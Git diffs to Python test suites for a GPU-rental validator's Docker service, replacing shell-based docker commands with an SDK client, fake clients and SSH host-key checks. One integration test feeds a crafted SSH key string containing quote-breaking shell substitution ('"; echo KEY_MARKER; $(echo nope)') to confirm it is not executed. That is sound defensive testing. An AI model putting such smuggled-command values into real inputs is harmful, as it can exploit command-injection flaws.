+    stdin_marker = "LOCAL_SDK_STDIN_MARKER"
+
+    api_client = docker.APIClient(timeout=60, **kwargs_from_env())
+    client = RentalDockerSdkClient(api_client)
+    try:
+        await client.pull(image=image)
+        await client.run_container(
+            ContainerRunSpec(
+                image=image,
+                name=container_name,
+                command=("sh", "-c", "trap : TERM INT; sleep infinity & wait"),
+                environment={"HOSTILE_ENV": hostile_env},
+                restart_policy=None,
+            )
+        )
+
+        inspect = api_client.inspect_container(container_name)
+        assert f"HOSTILE_ENV={hostile_env}" in (inspect["Config"].get("Env") or [])
+
+        result = await client.exec_in_container(
+            ContainerExecSpec(
+                container_name=container_name,
+                argv=("sh", "-c", "cat > /tmp/sdk-smoke && cat /tmp/sdk-smoke"),
+                stdin=f"{stdin_marker}\nsecond-line\n",
+            )
+        )
+        assert result.exit_status == 0
+        assert stdin_marker in result.stdout
+
+        key_result = await client.exec_in_container(
+            ContainerExecSpec(
+                container_name=container_name,
+                argv=("sh", "-c", "mkdir -p /root/.ssh && cat >> /root/.ssh/authorized_keys"),
+                stdin='ssh-ed25519 AAAA user"; echo KEY_MARKER; $(echo nope)\n',
+            )
+        )
+        assert key_result.exit_status == 0
+
+        await client.stop(container_name=container_name)
+        assert api_client.inspect_container(container_name)["State"]["Running"] is False
+
+        await client.start(container_name=container_name)
+        assert api_client.inspect_container(container_name)["State"]["Running"] is True
+
+        await client.remove_container(container_name=container_name, force=True, remove_volumes=True)
+        with pytest.raises(docker.errors.NotFound):
+            api_client.inspect_container(container_name)
+    finally:
+        try:
+            api_client.remove_container(container_name, force=True, v=True)
+        except Exception:
+            pass
+        await client.aclose()

--- a/neurons/validators/tests/test_custom_dockerfile_build.py
+++ b/neurons/validators/tests/test_custom_dockerfile_build.py
@@ -71,6 +71,7 @@ class _FakeRentalDockerClient:
         self.pulled_images = []
         self.run_specs = []
         self.exec_specs = []
+        self.created_volumes = []
         self.removed_volumes = []
         self.pruned_images = 0
         self.pull_error = None
@@ -92,6 +93,23 @@ class _FakeRentalDockerClient:
     async def exec_in_container(self, spec) -> ContainerExecResult:
         self.exec_specs.append(spec)
         return ContainerExecResult(exit_status=0)
+
+    async def create_volume(
+        self,
+        *,
+        volume_name: str,
+        driver: str | None = None,
+        driver_opts: dict[str, str] | None = None,
+        timeout: int | None = None,
+    ) -> None:
+        self.created_volumes.append(
+            {
+                "volume_name": volume_name,
+                "driver": driver,
+                "driver_opts": driver_opts,
+                "timeout": timeout,
+            }
+        )
 
     async def remove_volume(self, *, volume_name: str, force: bool = False) -> None:
         self.removed_volumes.append(

--- a/neurons/validators/tests/test_custom_dockerfile_build.py
+++ b/neurons/validators/tests/test_custom_dockerfile_build.py
@@ -35,6 +35,7 @@ from payload_models.payloads import (
     PayloadPortMapping,
 )
 from services.docker_service import DockerService
+from services.rental_docker_sdk import ContainerExecResult, build_gpu_docker_config
 
 # ------------------------------------------------------------------
 # Shared fixtures / helpers
@@ -60,7 +61,53 @@ async def svc(deps):
         ssh_service=ssh_service,
         redis_service=redis_service,
         attestation_service=attestation_service,
+        rental_docker_client_factory=_FakeRentalDockerFactory(),
     )
+
+
+class _FakeRentalDockerClient:
+    def __init__(self):
+        self.login_calls = []
+        self.pulled_images = []
+        self.run_specs = []
+        self.exec_specs = []
+        self.pull_error = None
+        self.run_error = None
+
+    async def login(self, *, username: str, password: str) -> None:
+        self.login_calls.append({"username": username, "password": password})
+
+    async def pull(self, *, image: str) -> None:
+        self.pulled_images.append(image)
+        if self.pull_error is not None:
+            raise self.pull_error
+
+    async def run_container(self, spec) -> None:
+        self.run_specs.append(spec)
+        if self.run_error is not None:
+            raise self.run_error
+
+    async def exec_in_container(self, spec) -> ContainerExecResult:
+        self.exec_specs.append(spec)
+        return ContainerExecResult(exit_status=0)
+
+
+class _FakeRentalDockerFactory:
+    def __init__(self):
+        self.client = _FakeRentalDockerClient()
+        self.connect_calls = []
+
+    def connect(self, *, executor_info: ExecutorSSHInfo, private_key: str):
+        self.connect_calls.append(
+            {"executor_info": executor_info, "private_key": private_key}
+        )
+        return self
+
+    async def __aenter__(self):
+        return self.client
+
+    async def __aexit__(self, exc_type, exc_val, exc_tb):
+        return None
 
 
 class _ConnCtx:
@@ -179,7 +226,10 @@ def _patch_create_container_happy(svc, monkeypatch, ssh_client):
         Mock(return_value=_ConnCtx(ssh_client)),
     )
     monkeypatch.setattr("services.docker_service.asyncssh.import_private_key", Mock())
-    monkeypatch.setattr("services.docker_service.build_gpu_flags", AsyncMock(return_value=""))
+    monkeypatch.setattr(
+        "services.docker_service.build_gpu_docker_config_for_executor",
+        AsyncMock(return_value=build_gpu_docker_config(["GPU-test"])),
+    )
     svc.ssh_service.decrypt_payload = Mock(return_value="private-key")
     svc.redis_service.add_pending_pod = AsyncMock()
     svc.redis_service.remove_pending_pod = AsyncMock()
@@ -196,9 +246,12 @@ def _patch_create_container_happy(svc, monkeypatch, ssh_client):
         svc, "wait_for_port_check_containers",
         AsyncMock(return_value=(True, "ok")),
     )
-    monkeypatch.setattr(svc, "_run_docker_create_with_port_retry", AsyncMock())
     monkeypatch.setattr(svc, "check_container_running", AsyncMock(return_value=True))
-    monkeypatch.setattr(svc, "install_open_ssh_server_and_start_ssh_service", AsyncMock())
+    monkeypatch.setattr(
+        svc,
+        "install_open_ssh_server_and_start_ssh_service_with_rental_docker",
+        AsyncMock(return_value=True),
+    )
     monkeypatch.setattr(svc, "stream_log", AsyncMock())
     monkeypatch.setattr(svc, "finish_stream_logs", AsyncMock())
     monkeypatch.setattr(svc, "handle_stream_logs", AsyncMock())
@@ -335,17 +388,13 @@ async def test_A2_build_success_overrides_docker_image_tag(svc, monkeypatch):
     # docker_image was replaced with lium-build-{pod_id}
     assert payload.docker_image == f"lium-build-{payload.pod_id}"
 
-    # The docker run command (captured via _run_docker_create_with_port_retry)
-    # must reference the built tag.
-    run_call = svc._run_docker_create_with_port_retry.await_args
-    assert run_call is not None
-    cmd = run_call.kwargs.get("command", "")
-    assert f"lium-build-{payload.pod_id}" in cmd
+    run_spec = svc.rental_docker_client_factory.client.run_specs[-1]
+    assert run_spec.image == f"lium-build-{payload.pod_id}"
 
 
 @pytest.mark.asyncio
 async def test_A2_image_pull_path_unchanged_when_dockerfile_none(svc, monkeypatch):
-    """Default branch is byte-identical: pull command emitted, no build helper invoked."""
+    """Default branch still pulls the requested image and skips custom build."""
     ssh_client = AsyncMock()
 
     # DAH-1524: the pull is now guarded by a `docker image inspect` probe. Make
@@ -362,11 +411,7 @@ async def test_A2_image_pull_path_unchanged_when_dockerfile_none(svc, monkeypatc
     build_mock = AsyncMock(return_value=(True, None))
     monkeypatch.setattr(svc, "_custom_build_image", build_mock)
 
-    captured_cmds: list[str] = []
-    async def _capture_exec(**kwargs):
-        captured_cmds.append(kwargs.get("command", ""))
-        return (True, "")
-    monkeypatch.setattr(svc, "execute_and_stream_logs", _capture_exec)
+    monkeypatch.setattr(svc, "execute_and_stream_logs", AsyncMock(return_value=(True, "")))
 
     payload = _base_payload(dockerfile_content=None, docker_image="daturaai/pytorch:1.2.3")
     await svc.create_container(
@@ -377,7 +422,9 @@ async def test_A2_image_pull_path_unchanged_when_dockerfile_none(svc, monkeypatc
     )
 
     build_mock.assert_not_awaited()
-    assert any("/usr/bin/docker pull daturaai/pytorch:1.2.3" in c for c in captured_cmds), captured_cmds
+    assert svc.rental_docker_client_factory.client.pulled_images == [
+        "daturaai/pytorch:1.2.3"
+    ]
 
 
 # ------------------------------------------------------------------

--- a/neurons/validators/tests/test_custom_dockerfile_build.py
+++ b/neurons/validators/tests/test_custom_dockerfile_build.py
@@ -71,6 +71,8 @@ class _FakeRentalDockerClient:
         self.pulled_images = []
         self.run_specs = []
         self.exec_specs = []
+        self.removed_volumes = []
+        self.pruned_images = 0
         self.pull_error = None
         self.run_error = None
 
@@ -90,6 +92,14 @@ class _FakeRentalDockerClient:
     async def exec_in_container(self, spec) -> ContainerExecResult:
         self.exec_specs.append(spec)
         return ContainerExecResult(exit_status=0)
+
+    async def remove_volume(self, *, volume_name: str, force: bool = False) -> None:
+        self.removed_volumes.append(
+            {"volume_name": volume_name, "force": force}
+        )
+
+    async def prune_images(self) -> None:
+        self.pruned_images += 1
 
 
 class _FakeRentalDockerFactory:

--- a/neurons/validators/tests/test_custom_dockerfile_build.py
+++ b/neurons/validators/tests/test_custom_dockerfile_build.py
@@ -243,6 +243,7 @@ def _executor_info_for(payload: ContainerCreateRequest) -> ExecutorSSHInfo:
         ssh_port=2200,
         python_path="/usr/bin/python",
         root_dir="/root/app",
+        ssh_host_key="ssh-ed25519 AAAATESTKEY",
     )
 
 

--- a/neurons/validators/tests/test_deploy_optimizations.py
+++ b/neurons/validators/tests/test_deploy_optimizations.py
@@ -153,6 +153,7 @@ def _executor_info(payload: ContainerCreateRequest) -> ExecutorSSHInfo:
         ssh_port=2200,
         python_path="/usr/bin/python",
         root_dir="/root/app",
+        ssh_host_key="ssh-ed25519 AAAATESTKEY",
     )
 
 

--- a/neurons/validators/tests/test_deploy_optimizations.py
+++ b/neurons/validators/tests/test_deploy_optimizations.py
@@ -30,6 +30,7 @@ from payload_models.payloads import (
     now_ms,
 )
 from services.docker_service import DockerService
+from services.rental_docker_sdk import ContainerExecResult, build_gpu_docker_config
 
 # ------------------------------------------------------------------
 # Fixtures / helpers
@@ -65,19 +66,61 @@ def _ssh_result(exit_status: int = 0, stdout: str = "", stderr: str = ""):
 
 
 def _ssh_client(*, inspect_exit: int = 0, inspect_raises: bool = False):
-    """AsyncMock ssh connection whose `run` answers the image-inspect probe
-    deterministically and returns exit 0 for everything else."""
+    """AsyncMock ssh connection plus SDK image-probe controls.
+
+    The image presence probe moved from host-side `docker image inspect` to
+    Docker SDK data calls; keep the old test inputs so the test intent stays
+    readable while `_patch_happy` maps them onto the fake SDK client.
+    """
     client = AsyncMock()
+    client.image_exists_result = inspect_exit == 0
+    client.image_exists_error = RuntimeError("probe boom") if inspect_raises else None
 
     def _side(cmd, *args, **kwargs):
-        if "image inspect" in cmd:
-            if inspect_raises:
-                raise RuntimeError("probe boom")
-            return _ssh_result(exit_status=inspect_exit)
         return _ssh_result(exit_status=0)
 
     client.run = AsyncMock(side_effect=_side)
     return client
+
+
+class _FakeRentalDockerClient:
+    def __init__(self, *, image_exists_result: bool, image_exists_error=None):
+        self.image_exists_result = image_exists_result
+        self.image_exists_error = image_exists_error
+        self.image_exists_calls = []
+        self.pulled_images = []
+        self.run_specs = []
+        self.exec_specs = []
+
+    async def image_exists(self, *, image: str) -> bool:
+        self.image_exists_calls.append(image)
+        if self.image_exists_error is not None:
+            raise self.image_exists_error
+        return self.image_exists_result
+
+    async def pull(self, *, image: str) -> None:
+        self.pulled_images.append(image)
+
+    async def run_container(self, spec) -> None:
+        self.run_specs.append(spec)
+
+    async def exec_in_container(self, spec) -> ContainerExecResult:
+        self.exec_specs.append(spec)
+        return ContainerExecResult(exit_status=0)
+
+
+class _FakeRentalDockerFactory:
+    def __init__(self, client):
+        self.client = client
+
+    def connect(self, *, executor_info: ExecutorSSHInfo, private_key: str):
+        return self
+
+    async def __aenter__(self):
+        return self.client
+
+    async def __aexit__(self, *exc):
+        return None
 
 
 def _payload(**over) -> ContainerCreateRequest:
@@ -116,12 +159,20 @@ def _executor_info(payload: ContainerCreateRequest) -> ExecutorSSHInfo:
 def _patch_happy(svc, monkeypatch, ssh_client):
     """Stub the whole deploy flow so only the new branch logic is exercised and
     create_container reaches a real ContainerCreated."""
+    docker_client = _FakeRentalDockerClient(
+        image_exists_result=ssh_client.image_exists_result,
+        image_exists_error=ssh_client.image_exists_error,
+    )
+    svc.rental_docker_client_factory = _FakeRentalDockerFactory(docker_client)
     monkeypatch.setattr(
         "services.docker_service.asyncssh.connect",
         Mock(return_value=_ConnCtx(ssh_client)),
     )
     monkeypatch.setattr("services.docker_service.asyncssh.import_private_key", Mock())
-    monkeypatch.setattr("services.docker_service.build_gpu_flags", AsyncMock(return_value=""))
+    monkeypatch.setattr(
+        "services.docker_service.build_gpu_docker_config_for_executor",
+        AsyncMock(return_value=build_gpu_docker_config(["GPU-test"])),
+    )
     svc.ssh_service.decrypt_payload = Mock(return_value="private-key")
     svc.redis_service.add_pending_pod = AsyncMock()
     svc.redis_service.remove_pending_pod = AsyncMock()
@@ -146,11 +197,11 @@ def _patch_happy(svc, monkeypatch, ssh_client):
         svc, "wait_for_port_check_containers",
         AsyncMock(return_value=(True, "ok")),
     )
-    monkeypatch.setattr(svc, "_run_docker_create_with_port_retry", AsyncMock())
+    monkeypatch.setattr(svc, "_run_rental_docker_create_with_port_retry", AsyncMock())
     monkeypatch.setattr(svc, "check_container_running", AsyncMock(return_value=True))
     monkeypatch.setattr(
         svc,
-        "install_open_ssh_server_and_start_ssh_service",
+        "install_open_ssh_server_and_start_ssh_service_with_rental_docker",
         AsyncMock(return_value=True),
     )
     monkeypatch.setattr(svc, "run_jupyter", AsyncMock())
@@ -169,12 +220,16 @@ async def _run(svc, payload):
     )
 
 
-def _pull_commands(svc):
-    return [
-        c.kwargs.get("command", "")
-        for c in svc.execute_and_stream_logs.await_args_list
-        if "docker pull" in c.kwargs.get("command", "")
-    ]
+def _docker_client(svc):
+    return svc.rental_docker_client_factory.client
+
+
+def _pulled_images(svc):
+    return _docker_client(svc).pulled_images
+
+
+def _exec_argv_texts(svc):
+    return [" ".join(spec.argv) for spec in _docker_client(svc).exec_specs]
 
 
 def _ssh_run_cmds(ssh_client):
@@ -194,7 +249,7 @@ async def test_pull_skipped_when_image_present(svc, monkeypatch):
     result = await _run(svc, _payload())
 
     assert isinstance(result, ContainerCreated)
-    assert _pull_commands(svc) == [], "docker pull must NOT be issued when image is present"
+    assert _pulled_images(svc) == [], "docker pull must NOT be issued when image is present"
     pull_step = next(p for p in result.profilers if p.name == ProfilerStepName.DOCKER_PULL)
     assert pull_step.skipped is True
 
@@ -207,7 +262,7 @@ async def test_pull_runs_when_image_absent(svc, monkeypatch):
     result = await _run(svc, _payload(docker_image="daturaai/pytorch:1.2.3"))
 
     assert isinstance(result, ContainerCreated)
-    assert any("/usr/bin/docker pull daturaai/pytorch:1.2.3" in c for c in _pull_commands(svc))
+    assert _pulled_images(svc) == ["daturaai/pytorch:1.2.3"]
     pull_step = next(p for p in result.profilers if p.name == ProfilerStepName.DOCKER_PULL)
     assert not pull_step.skipped
 
@@ -221,21 +276,21 @@ async def test_probe_error_falls_through_to_pull(svc, monkeypatch):
     result = await _run(svc, _payload(docker_image="daturaai/pytorch:9.9.9"))
 
     assert isinstance(result, ContainerCreated)
-    assert any("/usr/bin/docker pull daturaai/pytorch:9.9.9" in c for c in _pull_commands(svc))
+    assert _pulled_images(svc) == ["daturaai/pytorch:9.9.9"]
 
 
 @pytest.mark.asyncio
-async def test_inspect_probe_uses_check_false(svc, monkeypatch):
+async def test_inspect_probe_uses_sdk_data_not_host_shell(svc, monkeypatch):
     ssh_client = _ssh_client(inspect_exit=0)
     _patch_happy(svc, monkeypatch, ssh_client)
 
-    await _run(svc, _payload())
+    payload = _payload()
+    await _run(svc, payload)
 
-    inspect_calls = [
-        c for c in ssh_client.run.await_args_list if c.args and "image inspect" in c.args[0]
-    ]
-    assert inspect_calls, "expected a docker image inspect probe"
-    assert all(c.kwargs.get("check") is False for c in inspect_calls)
+    assert _docker_client(svc).image_exists_calls == [payload.docker_image]
+    assert not any(
+        "image inspect" in command for command in _ssh_run_cmds(ssh_client)
+    )
 
 
 # ------------------------------------------------------------------
@@ -251,20 +306,20 @@ async def test_ships_sshd_true_still_runs_bootstrap(svc, monkeypatch):
     result = await _run(svc, _payload(ships_sshd=True))
 
     assert isinstance(result, ContainerCreated)
-    svc.install_open_ssh_server_and_start_ssh_service.assert_awaited_once()
+    svc.install_open_ssh_server_and_start_ssh_service_with_rental_docker.assert_awaited_once()
 
 
 @pytest.mark.asyncio
 async def test_ships_sshd_true_fails_create_when_bootstrap_fails(svc, monkeypatch):
     ssh_client = _ssh_client(inspect_exit=0)
     _patch_happy(svc, monkeypatch, ssh_client)
-    svc.install_open_ssh_server_and_start_ssh_service.return_value = False
+    svc.install_open_ssh_server_and_start_ssh_service_with_rental_docker.return_value = False
 
     result = await _run(svc, _payload(ships_sshd=True))
 
     assert isinstance(result, FailedContainerRequest)
     assert result.failure_step == "ssh_bootstrap"
-    svc.install_open_ssh_server_and_start_ssh_service.assert_awaited_once()
+    svc.install_open_ssh_server_and_start_ssh_service_with_rental_docker.assert_awaited_once()
 
 
 @pytest.mark.asyncio
@@ -286,7 +341,7 @@ async def test_default_ships_sshd_none_runs_full_bootstrap(svc, monkeypatch):
     result = await _run(svc, payload)
 
     assert isinstance(result, ContainerCreated)
-    svc.install_open_ssh_server_and_start_ssh_service.assert_awaited_once()
+    svc.install_open_ssh_server_and_start_ssh_service_with_rental_docker.assert_awaited_once()
 
 
 @pytest.mark.asyncio
@@ -297,19 +352,19 @@ async def test_ships_sshd_false_runs_install(svc, monkeypatch):
     result = await _run(svc, _payload(ships_sshd=False))
 
     assert isinstance(result, ContainerCreated)
-    svc.install_open_ssh_server_and_start_ssh_service.assert_awaited_once()
+    svc.install_open_ssh_server_and_start_ssh_service_with_rental_docker.assert_awaited_once()
 
 
 @pytest.mark.asyncio
 async def test_ships_sshd_false_preserves_lenient_bootstrap_failure(svc, monkeypatch):
     ssh_client = _ssh_client(inspect_exit=0)
     _patch_happy(svc, monkeypatch, ssh_client)
-    svc.install_open_ssh_server_and_start_ssh_service.return_value = False
+    svc.install_open_ssh_server_and_start_ssh_service_with_rental_docker.return_value = False
 
     result = await _run(svc, _payload(ships_sshd=False))
 
     assert isinstance(result, ContainerCreated)
-    svc.install_open_ssh_server_and_start_ssh_service.assert_awaited_once()
+    svc.install_open_ssh_server_and_start_ssh_service_with_rental_docker.assert_awaited_once()
 
 
 @pytest.mark.asyncio
@@ -325,7 +380,7 @@ async def test_ships_sshd_true_with_jupyter(svc, monkeypatch):
     result = await _run(svc, _payload(ships_sshd=True, enable_jupyter=True))
 
     assert isinstance(result, ContainerCreated)
-    svc.install_open_ssh_server_and_start_ssh_service.assert_awaited_once()
+    svc.install_open_ssh_server_and_start_ssh_service_with_rental_docker.assert_awaited_once()
     svc.run_jupyter.assert_awaited_once()
 
 
@@ -338,10 +393,14 @@ async def test_key_injection_runs_after_shipped_sshd_bootstrap(svc, monkeypatch)
     result = await _run(svc, _payload(ships_sshd=True, user_public_keys=keys))
 
     assert isinstance(result, ContainerCreated)
-    authorized = [c for c in _ssh_run_cmds(ssh_client) if "authorized_keys" in c]
-    assert len(authorized) == len(keys)
-    assert any("key-one" in c for c in authorized)
-    assert any("key-two" in c for c in authorized)
+    authorized = [
+        spec
+        for spec in _docker_client(svc).exec_specs
+        if "authorized_keys" in " ".join(spec.argv)
+    ]
+    assert len(authorized) == 1
+    assert "key-one" in authorized[0].stdin
+    assert "key-two" in authorized[0].stdin
 
 
 # ------------------------------------------------------------------
@@ -415,7 +474,7 @@ async def test_summary_not_emitted_on_failure(svc, monkeypatch):
     ssh_client = _ssh_client(inspect_exit=1)
     _patch_happy(svc, monkeypatch, ssh_client)
     monkeypatch.setattr(
-        svc, "_run_docker_create_with_port_retry",
+        svc, "_run_rental_docker_create_with_port_retry",
         AsyncMock(side_effect=RuntimeError("docker run failed")),
     )
     mock_logger = Mock()

--- a/neurons/validators/tests/test_docker_service.py
+++ b/neurons/validators/tests/test_docker_service.py
@@ -13,17 +13,35 @@ from services.docker_service import (
 )
 from services.rental_docker_sdk import ContainerExecResult, build_gpu_docker_config
 from payload_models.payloads import (
+    AddSshPublicKeyRequest,
     ContainerCreateRequest,
     CustomOptions,
     ContainerDeleteRequest,
     ContainerDeleted,
     ContainerStartRequest,
     ContainerStopRequest,
+    FailedContainerErrorTypes,
     FailedContainerRequest,
     PayloadPortMapping,
+    RemoveSshPublicKeysRequest,
     WorkloadKind,
 )
 from datura.requests.miner_requests import ExecutorSSHInfo
+
+
+FAKE_SSH_HOST_KEY = "ssh-ed25519 AAAATESTKEY"
+
+
+def _executor_without_host_key(executor_id: str) -> ExecutorSSHInfo:
+    return ExecutorSSHInfo(
+        uuid=executor_id,
+        address="127.0.0.1",
+        port=8001,
+        ssh_username="root",
+        ssh_port=2200,
+        python_path="/usr/bin/python3",
+        root_dir="/root/app",
+    )
 
 
 class _FakeRentalDockerClient:
@@ -849,6 +867,7 @@ async def test_delete_filler_container_treats_missing_container_as_deleted(
         ssh_port=2200,
         python_path="/usr/bin/python",
         root_dir="/root/app",
+        ssh_host_key=FAKE_SSH_HOST_KEY,
     )
     keypair = Mock(ss58_address="validator-hotkey")
 
@@ -1396,6 +1415,7 @@ async def test_start_container_restarts_ssh_after_docker_start(docker_service, m
         ssh_port=2200,
         python_path="/usr/bin/python3",
         root_dir="/root/app",
+        ssh_host_key=FAKE_SSH_HOST_KEY,
     )
     keypair = Mock(ss58_address="validator-hotkey")
 
@@ -1444,6 +1464,7 @@ async def test_start_container_logs_ssh_bootstrap_failure_and_keeps_starting(doc
         ssh_port=2200,
         python_path="/usr/bin/python3",
         root_dir="/root/app",
+        ssh_host_key=FAKE_SSH_HOST_KEY,
     )
     keypair = Mock(ss58_address="validator-hotkey")
     logger_mock = Mock()
@@ -1487,6 +1508,7 @@ async def test_start_container_sdk_failure_returns_failed_request_without_shell_
         ssh_port=2200,
         python_path="/usr/bin/python3",
         root_dir="/root/app",
+        ssh_host_key=FAKE_SSH_HOST_KEY,
     )
 
     result = await docker_service.start_container(
@@ -1532,6 +1554,7 @@ async def test_stop_container_sdk_failure_returns_failed_request_without_shell_f
         ssh_port=2200,
         python_path="/usr/bin/python3",
         root_dir="/root/app",
+        ssh_host_key=FAKE_SSH_HOST_KEY,
     )
 
     result = await docker_service.stop_container(
@@ -1546,6 +1569,158 @@ async def test_stop_container_sdk_failure_returns_failed_request_without_shell_f
     assert docker_service.rental_docker_client_factory.client.stopped_containers == [
         "pod_test"
     ]
+
+
+@pytest.mark.asyncio
+@pytest.mark.parametrize(
+    ("method_name", "payload", "error_type"),
+    [
+        (
+            "stop_container",
+            ContainerStopRequest(
+                miner_hotkey="miner-hotkey",
+                miner_address="127.0.0.1",
+                miner_port=8000,
+                executor_id=str(uuid4()),
+                pod_id="pod-id",
+                container_name="pod_test",
+            ),
+            FailedContainerErrorTypes.ContainerStopFailed,
+        ),
+        (
+            "start_container",
+            ContainerStartRequest(
+                miner_hotkey="miner-hotkey",
+                miner_address="127.0.0.1",
+                miner_port=8000,
+                executor_id=str(uuid4()),
+                pod_id="pod-id",
+                container_name="pod_test",
+            ),
+            FailedContainerErrorTypes.ContainerStartFailed,
+        ),
+        (
+            "delete_container",
+            ContainerDeleteRequest(
+                miner_hotkey="miner-hotkey",
+                miner_address="127.0.0.1",
+                miner_port=8000,
+                executor_id=str(uuid4()),
+                pod_id="pod-id",
+                container_name="pod_test",
+            ),
+            FailedContainerErrorTypes.ContainerDeletionFailed,
+        ),
+        (
+            "add_ssh_key",
+            AddSshPublicKeyRequest(
+                miner_hotkey="miner-hotkey",
+                miner_address="127.0.0.1",
+                miner_port=8000,
+                executor_id=str(uuid4()),
+                pod_id="pod-id",
+                container_name="pod_test",
+                user_public_keys=["ssh-ed25519 test-key"],
+            ),
+            FailedContainerErrorTypes.AddSSkeyFailed,
+        ),
+        (
+            "remove_ssh_keys",
+            RemoveSshPublicKeysRequest(
+                miner_hotkey="miner-hotkey",
+                miner_address="127.0.0.1",
+                miner_port=8000,
+                executor_id=str(uuid4()),
+                pod_id="pod-id",
+                container_name="pod_test",
+                user_public_keys=["ssh-ed25519 test-key"],
+            ),
+            FailedContainerErrorTypes.AddSSkeyFailed,
+        ),
+    ],
+)
+async def test_sdk_lifecycle_missing_host_key_returns_typed_failure_without_sdk_connect(
+    docker_service,
+    monkeypatch,
+    method_name,
+    payload,
+    error_type,
+):
+    docker_service.ssh_service.decrypt_payload.return_value = "private-key"
+    docker_service._prepare_known_hosts_policy = AsyncMock(return_value=None)
+    monkeypatch.setattr("services.docker_service.asyncssh.import_private_key", Mock())
+    connect_mock = Mock(side_effect=AssertionError("asyncssh connect is not expected"))
+    monkeypatch.setattr("services.docker_service.asyncssh.connect", connect_mock)
+
+    result = await getattr(docker_service, method_name)(
+        payload,
+        _executor_without_host_key(payload.executor_id),
+        Mock(ss58_address="validator-hotkey"),
+        "encrypted-private-key",
+    )
+
+    assert isinstance(result, FailedContainerRequest)
+    assert result.error_type == error_type
+    assert "Missing executor SSH host key" in result.msg
+    assert docker_service.rental_docker_client_factory.connect_calls == []
+    assert connect_mock.call_count == 0
+
+
+@pytest.mark.asyncio
+async def test_create_container_missing_host_key_reports_sdk_host_key_failure_step(
+    docker_service,
+    monkeypatch,
+):
+    docker_service.ssh_service.decrypt_payload.return_value = "private-key"
+    docker_service.redis_service.add_pending_pod = AsyncMock()
+    docker_service.redis_service.remove_pending_pod = AsyncMock()
+    monkeypatch.setattr(docker_service, "_prepare_known_hosts_policy", AsyncMock(return_value=None))
+    monkeypatch.setattr(
+        docker_service,
+        "generate_portMappings",
+        AsyncMock(return_value=([(22, 20001, 20001)], None)),
+    )
+    monkeypatch.setattr("services.docker_service.asyncssh.import_private_key", Mock())
+    connect_mock = Mock(side_effect=AssertionError("asyncssh connect is not expected"))
+    monkeypatch.setattr("services.docker_service.asyncssh.connect", connect_mock)
+    monkeypatch.setattr(docker_service, "finish_stream_logs", AsyncMock())
+
+    payload = ContainerCreateRequest(
+        miner_hotkey="miner",
+        executor_id=str(uuid4()),
+        pod_id=str(uuid4()),
+        docker_image="daturaai/pytorch:test",
+        user_public_keys=["ssh-ed25519 test-key"],
+        gpu_uuids=["GPU-test"],
+        cpu_count=1,
+        memory_gb=1,
+        volume_limit_gb=2,
+        storage_limit_gb=1,
+        available_ports=[PayloadPortMapping(internal_port=20001, external_port=20001)],
+        pod_mapping=[],
+        active_container_names=[],
+        active_volume_names=[],
+    )
+
+    result = await docker_service.create_container(
+        payload=payload,
+        executor_info=_executor_without_host_key(payload.executor_id),
+        keypair=Mock(ss58_address="validator-hotkey"),
+        private_key="encrypted",
+    )
+
+    assert isinstance(result, FailedContainerRequest)
+    assert result.error_type == FailedContainerErrorTypes.ContainerCreationFailed
+    assert result.failure_step == "docker_sdk_ssh_host_key"
+    assert "missing ssh_host_key" in result.msg
+    docker_service.finish_stream_logs.assert_awaited_once()
+    docker_service.redis_service.remove_pending_pod.assert_awaited_once_with(
+        payload.miner_hotkey,
+        payload.executor_id,
+        payload.pod_id,
+    )
+    assert docker_service.rental_docker_client_factory.connect_calls == []
+    assert connect_mock.call_count == 0
 
 
 @pytest.mark.asyncio
@@ -1885,6 +2060,7 @@ async def test_create_container_cleans_stale_vloopback_when_active_volumes_missi
         ssh_port=2200,
         python_path="/usr/bin/python",
         root_dir="/root/app",
+        ssh_host_key=FAKE_SSH_HOST_KEY,
     )
     keypair = Mock(ss58_address="validator-hotkey")
 
@@ -1974,6 +2150,7 @@ async def test_create_container_clears_pending_pod_after_successful_filler_creat
         ssh_port=2200,
         python_path="/usr/bin/python",
         root_dir="/root/app",
+        ssh_host_key=FAKE_SSH_HOST_KEY,
     )
     keypair = Mock(ss58_address="validator-hotkey")
 
@@ -2063,6 +2240,7 @@ async def test_create_container_uses_keepalives_and_sdk_pull(
         ssh_port=2200,
         python_path="/usr/bin/python",
         root_dir="/root/app",
+        ssh_host_key=FAKE_SSH_HOST_KEY,
     )
 
     await docker_service.create_container(
@@ -2142,6 +2320,7 @@ async def test_create_container_reports_docker_pull_failure_step(
         ssh_port=2200,
         python_path="/usr/bin/python",
         root_dir="/root/app",
+        ssh_host_key=FAKE_SSH_HOST_KEY,
     )
 
     result = await docker_service.create_container(
@@ -2240,6 +2419,7 @@ async def test_create_container_reports_set_environment_failure_step(
         ssh_port=2200,
         python_path="/usr/bin/python",
         root_dir="/root/app",
+        ssh_host_key=FAKE_SSH_HOST_KEY,
     )
 
     result = await docker_service.create_container(
@@ -3568,6 +3748,7 @@ async def test_create_container_fresh_sizing_uses_effective_values(
         ssh_port=2200,
         python_path="/usr/bin/python",
         root_dir="/root/app",
+        ssh_host_key=FAKE_SSH_HOST_KEY,
     )
     keypair = Mock(ss58_address="validator-hotkey")
 

--- a/neurons/validators/tests/test_docker_service.py
+++ b/neurons/validators/tests/test_docker_service.py
@@ -12,15 +12,96 @@ from services.docker_service import (
     VolumeMinSizeError,
     _parse_volume_size_to_bytes,
 )
+from services.rental_docker_sdk import ContainerExecResult, build_gpu_docker_config
 from payload_models.payloads import (
     ContainerCreateRequest,
     ContainerDeleteRequest,
     ContainerDeleted,
     ContainerStartRequest,
+    ContainerStopRequest,
+    FailedContainerRequest,
     PayloadPortMapping,
     WorkloadKind,
 )
 from datura.requests.miner_requests import ExecutorSSHInfo
+
+
+class _FakeRentalDockerClient:
+    def __init__(self):
+        self.login_calls = []
+        self.pulled_images = []
+        self.run_specs = []
+        self.exec_specs = []
+        self.started_containers = []
+        self.stopped_containers = []
+        self.removed_containers = []
+        self.pull_error = None
+        self.run_error = None
+        self.start_error = None
+        self.stop_error = None
+        self.remove_error = None
+
+    async def login(self, *, username: str, password: str) -> None:
+        self.login_calls.append({"username": username, "password": password})
+
+    async def pull(self, *, image: str) -> None:
+        self.pulled_images.append(image)
+        if self.pull_error is not None:
+            raise self.pull_error
+
+    async def run_container(self, spec) -> None:
+        self.run_specs.append(spec)
+        if self.run_error is not None:
+            raise self.run_error
+
+    async def exec_in_container(self, spec) -> ContainerExecResult:
+        self.exec_specs.append(spec)
+        return ContainerExecResult(exit_status=0)
+
+    async def start(self, *, container_name: str) -> None:
+        self.started_containers.append(container_name)
+        if self.start_error is not None:
+            raise self.start_error
+
